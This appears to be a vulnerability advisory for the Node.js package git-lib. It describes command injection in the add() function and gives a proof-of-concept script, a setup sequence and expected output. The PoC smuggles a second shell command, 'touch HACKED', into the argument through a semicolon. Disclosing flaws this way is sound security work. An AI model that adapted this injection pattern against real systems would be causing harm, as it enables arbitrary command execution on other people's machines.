git-lib is a library that exposes various git commands for use from Node.js.
Affected versions of this package are vulnerable to command injection leading to Remote Code Execution (RCE). User-supplied input is interpolated into a shell command string that is then executed without any validation or escaping, so shell metacharacters in the input (for example `;`) are interpreted as additional commands, as the PoC below demonstrates.
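// poc.js — demonstrates shell command injection in git-lib's add().
//
// The argument to add() is interpolated, unescaped, into a shell command, so
// the `;` in the payload terminates the git command and `touch HACKED` runs
// as a second shell command. Run this from inside a git repository; if the
// module is vulnerable a file named HACKED appears in the working directory.
'use strict';

const git = require("git-lib");

// `test` is the (non-existent) path handed to git add; everything after the
// first `;` is attacker-controlled shell.
const PAYLOAD = "test;touch HACKED;";

git.add(PAYLOAD)
  .then(() => {
    // successfully added
    console.log("git-lib add() resolved; check for a file named HACKED");
  })
  .catch((err) => {
    // unsuccessful — git add itself may well reject (the path "test" does not
    // exist), but with a `;` separator the injected command is expected to run
    // regardless of the preceding command's exit status, so a rejection here
    // does not mean the injection failed; still check for the HACKED file.
    console.error("git-lib add() rejected:", err);
  });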
HACKED
# Install the affected module
npm i git-lib

# Initialise a repository so the git commands have somewhere to run
# (avoids unrelated git errors masking the result)
git init

# Run the PoC; a file named HACKED appearing in this directory
# shows that the injected command was executed
node poc.js
git-lib